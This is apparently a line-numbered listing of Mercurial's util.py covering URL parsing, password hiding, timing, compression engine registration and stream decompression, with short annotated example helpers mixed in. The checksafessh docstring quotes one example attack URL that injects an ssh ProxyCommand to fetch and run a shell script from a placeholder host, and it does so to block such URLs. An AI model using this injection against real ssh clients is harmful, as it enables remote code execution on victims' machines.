2610 2623 def __init__(self, path, parsequery=True, parsefragment=True):
2611 2624 # We slowly chomp away at path until we have only the path left
2612 2625 self.scheme = self.user = self.passwd = self.host = None
2613 2626 self.port = self.path = self.query = self.fragment = None
2614 2627 self._localpath = True
2615 2628 self._hostport = ''
2616 2629 self._origpath = path
2617 2630
2618 2631 if parsefragment and '#' in path:
2619 2632 path, self.fragment = path.split('#', 1)
2620 2633
2621 2634 # special case for Windows drive letters and UNC paths
2622 2635 if hasdriveletter(path) or path.startswith('\\\\'):
2623 2636 self.path = path
2624 2637 return
2625 2638
2626 2639 # For compatibility reasons, we can't handle bundle paths as
2627 2640 # normal URLs
2628 2641 if path.startswith('bundle:'):
2629 2642 self.scheme = 'bundle'
2630 2643 path = path[7:]
2631 2644 if path.startswith('//'):
2632 2645 path = path[2:]
2633 2646 self.path = path
2634 2647 return
2635 2648
2636 2649 if self._matchscheme(path):
2637 2650 parts = path.split(':', 1)
2638 2651 if parts[0]:
2639 2652 self.scheme, path = parts
2640 2653 self._localpath = False
2641 2654
2642 2655 if not path:
2643 2656 path = None
2644 2657 if self._localpath:
2645 2658 self.path = ''
2646 2659 return
2647 2660 else:
2648 2661 if self._localpath:
2649 2662 self.path = path
2650 2663 return
2651 2664
2652 2665 if parsequery and '?' in path:
2653 2666 path, self.query = path.split('?', 1)
2654 2667 if not path:
2655 2668 path = None
2656 2669 if not self.query:
2657 2670 self.query = None
2658 2671
2659 2672 # // is required to specify a host/authority
2660 2673 if path and path.startswith('//'):
2661 2674 parts = path[2:].split('/', 1)
2662 2675 if len(parts) > 1:
2663 2676 self.host, path = parts
2664 2677 else:
2665 2678 self.host = parts[0]
2666 2679 path = None
2667 2680 if not self.host:
2668 2681 self.host = None
2669 2682 # path of file:///d is /d
2670 2683 # path of file:///d:/ is d:/, not /d:/
2671 2684 if path and not hasdriveletter(path):
2672 2685 path = '/' + path
2673 2686
2674 2687 if self.host and '@' in self.host:
2675 2688 self.user, self.host = self.host.rsplit('@', 1)
2676 2689 if ':' in self.user:
2677 2690 self.user, self.passwd = self.user.split(':', 1)
2678 2691 if not self.host:
2679 2692 self.host = None
2680 2693
2681 2694 # Don't split on colons in IPv6 addresses without ports
2682 2695 if (self.host and ':' in self.host and
2683 2696 not (self.host.startswith('[') and self.host.endswith(']'))):
2684 2697 self._hostport = self.host
2685 2698 self.host, self.port = self.host.rsplit(':', 1)
2686 2699 if not self.host:
2687 2700 self.host = None
2688 2701
2689 2702 if (self.host and self.scheme == 'file' and
2690 2703 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2691 2704 raise error.Abort(_('file:// URLs can only refer to localhost'))
2692 2705
2693 2706 self.path = path
2694 2707
2695 2708 # leave the query string escaped
2696 2709 for a in ('user', 'passwd', 'host', 'port',
2697 2710 'path', 'fragment'):
2698 2711 v = getattr(self, a)
2699 2712 if v is not None:
2700 2713 setattr(self, a, urlreq.unquote(v))
2701 2714
2702 2715 @encoding.strmethod
2703 2716 def __repr__(self):
2704 2717 attrs = []
2705 2718 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2706 2719 'query', 'fragment'):
2707 2720 v = getattr(self, a)
2708 2721 if v is not None:
2709 2722 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2710 2723 return '<url %s>' % ', '.join(attrs)
2711 2724
2712 2725 def __bytes__(self):
2713 2726 r"""Join the URL's components back into a URL string.
2714 2727
2715 2728 Examples:
2716 2729
2717 2730 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2718 2731 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2719 2732 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2720 2733 'http://user:pw@host:80/?foo=bar&baz=42'
2721 2734 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2722 2735 'http://user:pw@host:80/?foo=bar%3dbaz'
2723 2736 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2724 2737 'ssh://user:pw@[::1]:2200//home/joe#'
2725 2738 >>> bytes(url(b'http://localhost:80//'))
2726 2739 'http://localhost:80//'
2727 2740 >>> bytes(url(b'http://localhost:80/'))
2728 2741 'http://localhost:80/'
2729 2742 >>> bytes(url(b'http://localhost:80'))
2730 2743 'http://localhost:80/'
2731 2744 >>> bytes(url(b'bundle:foo'))
2732 2745 'bundle:foo'
2733 2746 >>> bytes(url(b'bundle://../foo'))
2734 2747 'bundle:../foo'
2735 2748 >>> bytes(url(b'path'))
2736 2749 'path'
2737 2750 >>> bytes(url(b'file:///tmp/foo/bar'))
2738 2751 'file:///tmp/foo/bar'
2739 2752 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2740 2753 'file:///c:/tmp/foo/bar'
2741 2754 >>> print(url(br'bundle:foo\bar'))
2742 2755 bundle:foo\bar
2743 2756 >>> print(url(br'file:///D:\data\hg'))
2744 2757 file:///D:\data\hg
2745 2758 """
2746 2759 if self._localpath:
2747 2760 s = self.path
2748 2761 if self.scheme == 'bundle':
2749 2762 s = 'bundle:' + s
2750 2763 if self.fragment:
2751 2764 s += '#' + self.fragment
2752 2765 return s
2753 2766
2754 2767 s = self.scheme + ':'
2755 2768 if self.user or self.passwd or self.host:
2756 2769 s += '//'
2757 2770 elif self.scheme and (not self.path or self.path.startswith('/')
2758 2771 or hasdriveletter(self.path)):
2759 2772 s += '//'
2760 2773 if hasdriveletter(self.path):
2761 2774 s += '/'
2762 2775 if self.user:
2763 2776 s += urlreq.quote(self.user, safe=self._safechars)
2764 2777 if self.passwd:
2765 2778 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2766 2779 if self.user or self.passwd:
2767 2780 s += '@'
2768 2781 if self.host:
2769 2782 if not (self.host.startswith('[') and self.host.endswith(']')):
2770 2783 s += urlreq.quote(self.host)
2771 2784 else:
2772 2785 s += self.host
2773 2786 if self.port:
2774 2787 s += ':' + urlreq.quote(self.port)
2775 2788 if self.host:
2776 2789 s += '/'
2777 2790 if self.path:
2778 2791 # TODO: similar to the query string, we should not unescape the
2779 2792 # path when we store it, the path might contain '%2f' = '/',
2780 2793 # which we should *not* escape.
2781 2794 s += urlreq.quote(self.path, safe=self._safepchars)
2782 2795 if self.query:
2783 2796 # we store the query in escaped form.
2784 2797 s += '?' + self.query
2785 2798 if self.fragment is not None:
2786 2799 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2787 2800 return s
2788 2801
2789 2802 __str__ = encoding.strmethod(__bytes__)
2790 2803
2791 2804 def authinfo(self):
2792 2805 user, passwd = self.user, self.passwd
2793 2806 try:
2794 2807 self.user, self.passwd = None, None
2795 2808 s = bytes(self)
2796 2809 finally:
2797 2810 self.user, self.passwd = user, passwd
2798 2811 if not self.user:
2799 2812 return (s, None)
2800 2813 # authinfo[1] is passed to urllib2 password manager, and its
2801 2814 # URIs must not contain credentials. The host is passed in the
2802 2815 # URIs list because Python < 2.4.3 uses only that to search for
2803 2816 # a password.
2804 2817 return (s, (None, (s, self.host),
2805 2818 self.user, self.passwd or ''))
2806 2819
2807 2820 def isabs(self):
2808 2821 if self.scheme and self.scheme != 'file':
2809 2822 return True # remote URL
2810 2823 if hasdriveletter(self.path):
2811 2824 return True # absolute for our purposes - can't be joined()
2812 2825 if self.path.startswith(br'\\'):
2813 2826 return True # Windows UNC path
2814 2827 if self.path.startswith('/'):
2815 2828 return True # POSIX-style
2816 2829 return False
2817 2830
2818 2831 def localpath(self):
2819 2832 if self.scheme == 'file' or self.scheme == 'bundle':
2820 2833 path = self.path or '/'
2821 2834 # For Windows, we need to promote hosts containing drive
2822 2835 # letters to paths with drive letters.
2823 2836 if hasdriveletter(self._hostport):
2824 2837 path = self._hostport + '/' + self.path
2825 2838 elif (self.host is not None and self.path
2826 2839 and not hasdriveletter(path)):
2827 2840 path = '/' + path
2828 2841 return path
2829 2842 return self._origpath
2830 2843
2831 2844 def islocal(self):
2832 2845 '''whether localpath will return something that posixfile can open'''
2833 2846 return (not self.scheme or self.scheme == 'file'
2834 2847 or self.scheme == 'bundle')
2835 2848
2836 2849 def hasscheme(path):
2837 2850 return bool(url(path).scheme)
2838 2851
2839 2852 def hasdriveletter(path):
2840 2853 return path and path[1:2] == ':' and path[0:1].isalpha()
2841 2854
2842 2855 def urllocalpath(path):
2843 2856 return url(path, parsequery=False, parsefragment=False).localpath()
2844 2857
2845 2858 def checksafessh(path):
2846 2859 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2847 2860
2848 2861 This is a sanity check for ssh urls. ssh will parse the first item as
2849 2862 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2850 2863 Let's prevent these potentially exploited urls entirely and warn the
2851 2864 user.
2852 2865
2853 2866 Raises an error.Abort when the url is unsafe.
2854 2867 """
2855 2868 path = urlreq.unquote(path)
2856 2869 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2857 2870 raise error.Abort(_('potentially unsafe url: %r') %
2858 2871 (pycompat.bytestr(path),))
2859 2872
2860 2873 def hidepassword(u):
2861 2874 '''hide user credential in a url string'''
2862 2875 u = url(u)
2863 2876 if u.passwd:
2864 2877 u.passwd = '***'
2865 2878 return bytes(u)
2866 2879
2867 2880 def removeauth(u):
2868 2881 '''remove all authentication information from a url string'''
2869 2882 u = url(u)
2870 2883 u.user = u.passwd = None
2871 2884 return bytes(u)
2872 2885
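# Editorial sketch: sanitize credentials before echoing a URL to a user or a
# log file. Hypothetical helper.
def _demosanitizeurl():
    # -> b'http://joe:***@example.com/repo'
    return hidepassword(b'http://joe:secret@example.com/repo')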
2873 2886 timecount = unitcountfn(
2874 2887 (1, 1e3, _('%.0f s')),
2875 2888 (100, 1, _('%.1f s')),
2876 2889 (10, 1, _('%.2f s')),
2877 2890 (1, 1, _('%.3f s')),
2878 2891 (100, 0.001, _('%.1f ms')),
2879 2892 (10, 0.001, _('%.2f ms')),
2880 2893 (1, 0.001, _('%.3f ms')),
2881 2894 (100, 0.000001, _('%.1f us')),
2882 2895 (10, 0.000001, _('%.2f us')),
2883 2896 (1, 0.000001, _('%.3f us')),
2884 2897 (100, 0.000000001, _('%.1f ns')),
2885 2898 (10, 0.000000001, _('%.2f ns')),
2886 2899 (1, 0.000000001, _('%.3f ns')),
2887 2900 )
2888 2901
2889 2902 @attr.s
2890 2903 class timedcmstats(object):
2891 2904 """Stats information produced by the timedcm context manager on entering."""
2892 2905
2893 2906 # the starting value of the timer as a float (meaning and resolution are
2894 2907 # platform dependent, see util.timer)
2895 2908 start = attr.ib(default=attr.Factory(lambda: timer()))
2896 2909 # the number of seconds as a floating point value; starts at 0, updated when
2897 2910 # the context is exited.
2898 2911 elapsed = attr.ib(default=0)
2899 2912 # the number of nested timedcm context managers.
2900 2913 level = attr.ib(default=1)
2901 2914
2902 2915 def __bytes__(self):
2903 2916 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2904 2917
2905 2918 __str__ = encoding.strmethod(__bytes__)
2906 2919
2907 2920 @contextlib.contextmanager
2908 2921 def timedcm(whencefmt, *whenceargs):
2909 2922 """A context manager that produces timing information for a given context.
2910 2923
2911 2924 On entering, a timedcmstats instance is produced.
2912 2925
2913 2926 This context manager is reentrant.
2914 2927
2915 2928 """
2916 2929 # track nested context managers
2917 2930 timedcm._nested += 1
2918 2931 timing_stats = timedcmstats(level=timedcm._nested)
2919 2932 try:
2920 2933 with tracing.log(whencefmt, *whenceargs):
2921 2934 yield timing_stats
2922 2935 finally:
2923 2936 timing_stats.elapsed = timer() - timing_stats.start
2924 2937 timedcm._nested -= 1
2925 2938
2926 2939 timedcm._nested = 0
2927 2940
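# Editorial sketch: timedcm hands out the stats object up front and fills in
# .elapsed when the block exits, so the result can be rendered afterwards.
# Hypothetical helper.
def _demotimedcm():
    with timedcm(b'demo') as stats:
        sum(range(1000))
    return bytes(stats)  # e.g. '1.23 ms', via timecount()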
2928 2941 def timed(func):
2929 2942 '''Report the execution time of a function call to stderr.
2930 2943
2931 2944 During development, use as a decorator when you need to measure
2932 2945 the cost of a function, e.g. as follows:
2933 2946
2934 2947 @util.timed
2935 2948 def foo(a, b, c):
2936 2949 pass
2937 2950 '''
2938 2951
2939 2952 def wrapper(*args, **kwargs):
2940 2953 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
2941 2954 result = func(*args, **kwargs)
2942 2955 stderr = procutil.stderr
2943 2956 stderr.write('%s%s: %s\n' % (
2944 2957 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
2945 2958 time_stats))
2946 2959 return result
2947 2960 return wrapper
2948 2961
2949 2962 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2950 2963 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2951 2964
2952 2965 def sizetoint(s):
2953 2966 '''Convert a space specifier to a byte count.
2954 2967
2955 2968 >>> sizetoint(b'30')
2956 2969 30
2957 2970 >>> sizetoint(b'2.2kb')
2958 2971 2252
2959 2972 >>> sizetoint(b'6M')
2960 2973 6291456
2961 2974 '''
2962 2975 t = s.strip().lower()
2963 2976 try:
2964 2977 for k, u in _sizeunits:
2965 2978 if t.endswith(k):
2966 2979 return int(float(t[:-len(k)]) * u)
2967 2980 return int(t)
2968 2981 except ValueError:
2969 2982 raise error.ParseError(_("couldn't parse size: %s") % s)
2970 2983
2971 2984 class hooks(object):
2972 2985 '''A collection of hook functions that can be used to extend a
2973 2986 function's behavior. Hooks are called in lexicographic order,
2974 2987 based on the names of their sources.'''
2975 2988
2976 2989 def __init__(self):
2977 2990 self._hooks = []
2978 2991
2979 2992 def add(self, source, hook):
2980 2993 self._hooks.append((source, hook))
2981 2994
2982 2995 def __call__(self, *args):
2983 2996 self._hooks.sort(key=lambda x: x[0])
2984 2997 results = []
2985 2998 for source, hook in self._hooks:
2986 2999 results.append(hook(*args))
2987 3000 return results
2988 3001
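# Editorial sketch: hooks run sorted by source name, not registration order.
# Hypothetical helper.
def _demohooks():
    h = hooks()
    h.add(b'zzz-ext', lambda x: x + 1)
    h.add(b'aaa-ext', lambda x: x * 2)
    return h(3)  # -> [6, 4]: b'aaa-ext' sorts before b'zzz-ext'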
2989 3002 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2990 3003 '''Yields lines for a nicely formatted stacktrace.
2991 3004 Skips the 'skip' last entries, then returns the last 'depth' entries.
2992 3005 Each file+linenumber is formatted according to fileline.
2993 3006 Each line is formatted according to line.
2994 3007 If line is None, it yields:
2995 3008 length of longest filepath+line number,
2996 3009 filepath+linenumber,
2997 3010 function
2998 3011
2999 3012 Not to be used in production code, but very convenient while developing.
3000 3013 '''
3001 3014 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3002 3015 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3003 3016 ][-depth:]
3004 3017 if entries:
3005 3018 fnmax = max(len(entry[0]) for entry in entries)
3006 3019 for fnln, func in entries:
3007 3020 if line is None:
3008 3021 yield (fnmax, fnln, func)
3009 3022 else:
3010 3023 yield line % (fnmax, fnln, func)
3011 3024
3012 3025 def debugstacktrace(msg='stacktrace', skip=0,
3013 3026 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3014 3027 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3015 3028 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3016 3029 By default it will flush stdout first.
3017 3030 It can be used everywhere and intentionally does not require an ui object.
3018 3031 Not to be used in production code, but very convenient while developing.
3019 3032 '''
3020 3033 if otherf:
3021 3034 otherf.flush()
3022 3035 f.write('%s at:\n' % msg.rstrip())
3023 3036 for line in getstackframes(skip + 1, depth=depth):
3024 3037 f.write(line)
3025 3038 f.flush()
3026 3039
3027 3040 class dirs(object):
3028 3041 '''a multiset of directory names from a dirstate or manifest'''
3029 3042
3030 3043 def __init__(self, map, skip=None):
3031 3044 self._dirs = {}
3032 3045 addpath = self.addpath
3033 3046 if safehasattr(map, 'iteritems') and skip is not None:
3034 3047 for f, s in map.iteritems():
3035 3048 if s[0] != skip:
3036 3049 addpath(f)
3037 3050 else:
3038 3051 for f in map:
3039 3052 addpath(f)
3040 3053
3041 3054 def addpath(self, path):
3042 3055 dirs = self._dirs
3043 3056 for base in finddirs(path):
3044 3057 if base in dirs:
3045 3058 dirs[base] += 1
3046 3059 return
3047 3060 dirs[base] = 1
3048 3061
3049 3062 def delpath(self, path):
3050 3063 dirs = self._dirs
3051 3064 for base in finddirs(path):
3052 3065 if dirs[base] > 1:
3053 3066 dirs[base] -= 1
3054 3067 return
3055 3068 del dirs[base]
3056 3069
3057 3070 def __iter__(self):
3058 3071 return iter(self._dirs)
3059 3072
3060 3073 def __contains__(self, d):
3061 3074 return d in self._dirs
3062 3075
3063 3076 if safehasattr(parsers, 'dirs'):
3064 3077 dirs = parsers.dirs
3065 3078
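# Editorial sketch: dirs() is a multiset of ancestor directories; this shows
# the pure-Python semantics, and the C replacement from parsers is assumed to
# behave the same for a plain list. Hypothetical helper.
def _demodirs():
    d = dirs([b'a/b/c', b'a/d'])
    return b'a/b' in d, b'a/b/c' in d  # -> (True, False): files aren't dirs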
3066 3079 def finddirs(path):
3067 3080 pos = path.rfind('/')
3068 3081 while pos != -1:
3069 3082 yield path[:pos]
3070 3083 pos = path.rfind('/', 0, pos)
3071 3084
3072 3085 # compression code
3073 3086
3074 3087 SERVERROLE = 'server'
3075 3088 CLIENTROLE = 'client'
3076 3089
3077 3090 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3078 3091 (u'name', u'serverpriority',
3079 3092 u'clientpriority'))
3080 3093
3081 3094 class compressormanager(object):
3082 3095 """Holds registrations of various compression engines.
3083 3096
3084 3097 This class essentially abstracts the differences between compression
3085 3098 engines to allow new compression formats to be added easily, possibly from
3086 3099 extensions.
3087 3100
3088 3101 Compressors are registered against the global instance by calling its
3089 3102 ``register()`` method.
3090 3103 """
3091 3104 def __init__(self):
3092 3105 self._engines = {}
3093 3106 # Bundle spec human name to engine name.
3094 3107 self._bundlenames = {}
3095 3108 # Internal bundle identifier to engine name.
3096 3109 self._bundletypes = {}
3097 3110 # Revlog header to engine name.
3098 3111 self._revlogheaders = {}
3099 3112 # Wire proto identifier to engine name.
3100 3113 self._wiretypes = {}
3101 3114
3102 3115 def __getitem__(self, key):
3103 3116 return self._engines[key]
3104 3117
3105 3118 def __contains__(self, key):
3106 3119 return key in self._engines
3107 3120
3108 3121 def __iter__(self):
3109 3122 return iter(self._engines.keys())
3110 3123
3111 3124 def register(self, engine):
3112 3125 """Register a compression engine with the manager.
3113 3126
3114 3127 The argument must be a ``compressionengine`` instance.
3115 3128 """
3116 3129 if not isinstance(engine, compressionengine):
3117 3130 raise ValueError(_('argument must be a compressionengine'))
3118 3131
3119 3132 name = engine.name()
3120 3133
3121 3134 if name in self._engines:
3122 3135 raise error.Abort(_('compression engine %s already registered') %
3123 3136 name)
3124 3137
3125 3138 bundleinfo = engine.bundletype()
3126 3139 if bundleinfo:
3127 3140 bundlename, bundletype = bundleinfo
3128 3141
3129 3142 if bundlename in self._bundlenames:
3130 3143 raise error.Abort(_('bundle name %s already registered') %
3131 3144 bundlename)
3132 3145 if bundletype in self._bundletypes:
3133 3146 raise error.Abort(_('bundle type %s already registered by %s') %
3134 3147 (bundletype, self._bundletypes[bundletype]))
3135 3148
3136 3149 # Engines may decline an external-facing name; register it only if set.
3137 3150 if bundlename:
3138 3151 self._bundlenames[bundlename] = name
3139 3152
3140 3153 self._bundletypes[bundletype] = name
3141 3154
3142 3155 wiresupport = engine.wireprotosupport()
3143 3156 if wiresupport:
3144 3157 wiretype = wiresupport.name
3145 3158 if wiretype in self._wiretypes:
3146 3159 raise error.Abort(_('wire protocol compression %s already '
3147 3160 'registered by %s') %
3148 3161 (wiretype, self._wiretypes[wiretype]))
3149 3162
3150 3163 self._wiretypes[wiretype] = name
3151 3164
3152 3165 revlogheader = engine.revlogheader()
3153 3166 if revlogheader and revlogheader in self._revlogheaders:
3154 3167 raise error.Abort(_('revlog header %s already registered by %s') %
3155 3168 (revlogheader, self._revlogheaders[revlogheader]))
3156 3169
3157 3170 if revlogheader:
3158 3171 self._revlogheaders[revlogheader] = name
3159 3172
3160 3173 self._engines[name] = engine
3161 3174
3162 3175 @property
3163 3176 def supportedbundlenames(self):
3164 3177 return set(self._bundlenames.keys())
3165 3178
3166 3179 @property
3167 3180 def supportedbundletypes(self):
3168 3181 return set(self._bundletypes.keys())
3169 3182
3170 3183 def forbundlename(self, bundlename):
3171 3184 """Obtain a compression engine registered to a bundle name.
3172 3185
3173 3186 Will raise KeyError if the bundle type isn't registered.
3174 3187
3175 3188 Will abort if the engine is known but not available.
3176 3189 """
3177 3190 engine = self._engines[self._bundlenames[bundlename]]
3178 3191 if not engine.available():
3179 3192 raise error.Abort(_('compression engine %s could not be loaded') %
3180 3193 engine.name())
3181 3194 return engine
3182 3195
3183 3196 def forbundletype(self, bundletype):
3184 3197 """Obtain a compression engine registered to a bundle type.
3185 3198
3186 3199 Will raise KeyError if the bundle type isn't registered.
3187 3200
3188 3201 Will abort if the engine is known but not available.
3189 3202 """
3190 3203 engine = self._engines[self._bundletypes[bundletype]]
3191 3204 if not engine.available():
3192 3205 raise error.Abort(_('compression engine %s could not be loaded') %
3193 3206 engine.name())
3194 3207 return engine
3195 3208
3196 3209 def supportedwireengines(self, role, onlyavailable=True):
3197 3210 """Obtain compression engines that support the wire protocol.
3198 3211
3199 3212 Returns a list of engines in prioritized order, most desired first.
3200 3213
3201 3214 If ``onlyavailable`` is set, filter out engines that can't be
3202 3215 loaded.
3203 3216 """
3204 3217 assert role in (SERVERROLE, CLIENTROLE)
3205 3218
3206 3219 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3207 3220
3208 3221 engines = [self._engines[e] for e in self._wiretypes.values()]
3209 3222 if onlyavailable:
3210 3223 engines = [e for e in engines if e.available()]
3211 3224
3212 3225 def getkey(e):
3213 3226 # Sort first by priority, highest first. In case of tie, sort
3214 3227 # alphabetically. This is arbitrary, but ensures output is
3215 3228 # stable.
3216 3229 w = e.wireprotosupport()
3217 3230 return -1 * getattr(w, attr), w.name
3218 3231
3219 3232 return list(sorted(engines, key=getkey))
3220 3233
3221 3234 def forwiretype(self, wiretype):
3222 3235 engine = self._engines[self._wiretypes[wiretype]]
3223 3236 if not engine.available():
3224 3237 raise error.Abort(_('compression engine %s could not be loaded') %
3225 3238 engine.name())
3226 3239 return engine
3227 3240
3228 3241 def forrevlogheader(self, header):
3229 3242 """Obtain a compression engine registered to a revlog header.
3230 3243
3231 3244 Will raise KeyError if the revlog header value isn't registered.
3232 3245 """
3233 3246 return self._engines[self._revlogheaders[header]]
3234 3247
3235 3248 compengines = compressormanager()
3236 3249
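# Editorial sketch: engines are looked up through the global manager by their
# user-facing bundle spec name; 'gzip' is assumed to map to the zlib engine
# registered further down in this module. Hypothetical helper.
def _demoforbundlename():
    return compengines.forbundlename(b'gzip').name()  # -> b'zlib'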
3237 3250 class compressionengine(object):
3238 3251 """Base class for compression engines.
3239 3252
3240 3253 Compression engines must implement the interface defined by this class.
3241 3254 """
3242 3255 def name(self):
3243 3256 """Returns the name of the compression engine.
3244 3257
3245 3258 This is the key the engine is registered under.
3246 3259
3247 3260 This method must be implemented.
3248 3261 """
3249 3262 raise NotImplementedError()
3250 3263
3251 3264 def available(self):
3252 3265 """Whether the compression engine is available.
3253 3266
3254 3267 The intent of this method is to allow optional compression engines
3255 3268 that may not be available in all installations (such as engines relying
3256 3269 on C extensions that may not be present).
3257 3270 """
3258 3271 return True
3259 3272
3260 3273 def bundletype(self):
3261 3274 """Describes bundle identifiers for this engine.
3262 3275
3263 3276 If this compression engine isn't supported for bundles, returns None.
3264 3277
3265 3278 If this engine can be used for bundles, returns a 2-tuple of strings of
3266 3279 the user-facing "bundle spec" compression name and an internal
3267 3280 identifier used to denote the compression format within bundles. To
3268 3281 exclude the name from external usage, set the first element to ``None``.
3269 3282
3270 3283 If bundle compression is supported, the class must also implement
3271 3284 ``compressstream`` and `decompressorreader``.
3272 3285
3273 3286 The docstring of this method is used in the help system to tell users
3274 3287 about this engine.
3275 3288 """
3276 3289 return None
3277 3290
3278 3291 def wireprotosupport(self):
3279 3292 """Declare support for this compression format on the wire protocol.
3280 3293
3281 3294 If this compression engine isn't supported for compressing wire
3282 3295 protocol payloads, returns None.
3283 3296
3284 3297 Otherwise, returns ``compenginewireprotosupport`` with the following
3285 3298 fields:
3286 3299
3287 3300 * String format identifier
3288 3301 * Integer priority for the server
3289 3302 * Integer priority for the client
3290 3303
3291 3304 The integer priorities are used to order the advertisement of format
3292 3305 support by server and client. The highest integer is advertised
3293 3306 first. Integers with non-positive values aren't advertised.
3294 3307
3295 3308 The priority values are somewhat arbitrary and only used for default
3296 3309 ordering. The relative order can be changed via config options.
3297 3310
3298 3311 If wire protocol compression is supported, the class must also implement
3299 3312 ``compressstream`` and ``decompressorreader``.
3300 3313 """
3301 3314 return None
3302 3315
3303 3316 def revlogheader(self):
3304 3317 """Header added to revlog chunks that identifies this engine.
3305 3318
3306 3319 If this engine can be used to compress revlogs, this method should
3307 3320 return the bytes used to identify chunks compressed with this engine.
3308 3321 Else, the method should return ``None`` to indicate it does not
3309 3322 participate in revlog compression.
3310 3323 """
3311 3324 return None
3312 3325
3313 3326 def compressstream(self, it, opts=None):
3314 3327 """Compress an iterator of chunks.
3315 3328
3316 3329 The method receives an iterator (ideally a generator) of chunks of
3317 3330 bytes to be compressed. It returns an iterator (ideally a generator)
3318 3331 of chunks of bytes representing the compressed output.
3319 3332
3320 3333 Optionally accepts an argument defining how to perform compression.
3321 3334 Each engine treats this argument differently.
3322 3335 """
3323 3336 raise NotImplementedError()
3324 3337
3325 3338 def decompressorreader(self, fh):
3326 3339 """Perform decompression on a file object.
3327 3340
3328 3341 Argument is an object with a ``read(size)`` method that returns
3329 3342 compressed data. Return value is an object with a ``read(size)`` that
3330 3343 returns uncompressed data.
3331 3344 """
3332 3345 raise NotImplementedError()
3333 3346
3334 3347 def revlogcompressor(self, opts=None):
3335 3348 """Obtain an object that can be used to compress revlog entries.
3336 3349
3337 3350 The object has a ``compress(data)`` method that compresses binary
3338 3351 data. This method returns compressed binary data or ``None`` if
3339 3352 the data could not be compressed (too small, not compressible, etc).
3340 3353 The returned data should have a header uniquely identifying this
3341 3354 compression format so decompression can be routed to this engine.
3342 3355 This header should be identified by the ``revlogheader()`` return
3343 3356 value.
3344 3357
3345 3358 The object has a ``decompress(data)`` method that decompresses
3346 3359 data. The method will only be called if ``data`` begins with
3347 3360 ``revlogheader()``. The method should return the raw, uncompressed
3348 3361 data or raise a ``RevlogError``.
3349 3362
3350 3363 The object is reusable but is not thread safe.
3351 3364 """
3352 3365 raise NotImplementedError()
3353 3366
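To make the interface concrete, a minimal sketch of a pass-through engine; ``identity`` is a hypothetical name used only for illustration (the real minimal engine is the ``_noopengine`` registered below):

    from mercurial import util

    class _identityengine(util.compressionengine):
        def name(self):
            return 'identity'

        # Only the streaming pair is implemented; bundletype() or
        # wireprotosupport() would also need overriding before this
        # engine could actually serve bundles or the wire protocol.
        def compressstream(self, it, opts=None):
            return it  # chunks pass through unchanged

        def decompressorreader(self, fh):
            return fh  # reads already yield the "decompressed" data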
3354 3367 class _CompressedStreamReader(object):
3355 3368 def __init__(self, fh):
3356 3369 if safehasattr(fh, 'unbufferedread'):
3357 3370 self._reader = fh.unbufferedread
3358 3371 else:
3359 3372 self._reader = fh.read
3360 3373 self._pending = []
3361 3374 self._pos = 0
3362 3375 self._eof = False
3363 3376
3364 3377 def _decompress(self, chunk):
3365 3378 raise NotImplementedError()
3366 3379
3367 3380 def read(self, l):
3368 3381 buf = []
3369 3382 while True:
3370 3383 while self._pending:
3371 3384 if len(self._pending[0]) > l + self._pos:
3372 3385 newbuf = self._pending[0]
3373 3386 buf.append(newbuf[self._pos:self._pos + l])
3374 3387 self._pos += l
3375 3388 return ''.join(buf)
3376 3389
3377 3390 newbuf = self._pending.pop(0)
3378 3391 if self._pos:
3379 3392 buf.append(newbuf[self._pos:])
3380 3393 l -= len(newbuf) - self._pos
3381 3394 else:
3382 3395 buf.append(newbuf)
3383 3396 l -= len(newbuf)
3384 3397 self._pos = 0
3385 3398
3386 3399 if self._eof:
3387 3400 return ''.join(buf)
3388 3401 chunk = self._reader(65536)
3389 3402 self._decompress(chunk)
3390 3403 if not chunk and not self._pending and not self._eof:
3391 3404 # No progress and no new data, bail out
3392 3405 return ''.join(buf)
3393 3406
3394 3407 class _GzipCompressedStreamReader(_CompressedStreamReader):
3395 3408 def __init__(self, fh):
3396 3409 super(_GzipCompressedStreamReader, self).__init__(fh)
3397 3410 self._decompobj = zlib.decompressobj()
3398 3411 def _decompress(self, chunk):
3399 3412 newbuf = self._decompobj.decompress(chunk)
3400 3413 if newbuf:
3401 3414 self._pending.append(newbuf)
3402 3415 d = self._decompobj.copy()
3403 3416 try:
3404 3417 d.decompress('x')
3405 3418 d.flush()
3406 3419 if d.unused_data == 'x':
3407 3420 self._eof = True
3408 3421 except zlib.error:
3409 3422 pass
3410 3423
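The end-of-stream detection above deserves a note: rather than trusting zlib to signal EOF directly, the reader probes a copy of the decompressor with a sentinel byte; if the byte falls through to ``unused_data``, the deflate stream has already ended. The same trick in isolation:

    import zlib

    d = zlib.decompressobj()
    d.decompress(zlib.compress(b'payload'))   # consume one complete stream

    probe = d.copy()          # probe a copy so the real state stays untouched
    probe.decompress(b'x')    # past end of stream, 'x' is not consumed...
    probe.flush()
    print(probe.unused_data)  # ...so it surfaces here as b'x': EOF reached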
3411 3424 class _BZ2CompressedStreamReader(_CompressedStreamReader):
